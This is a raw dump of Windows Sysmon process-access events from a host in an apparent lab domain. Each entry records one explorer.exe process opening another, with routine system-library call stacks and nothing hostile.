16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 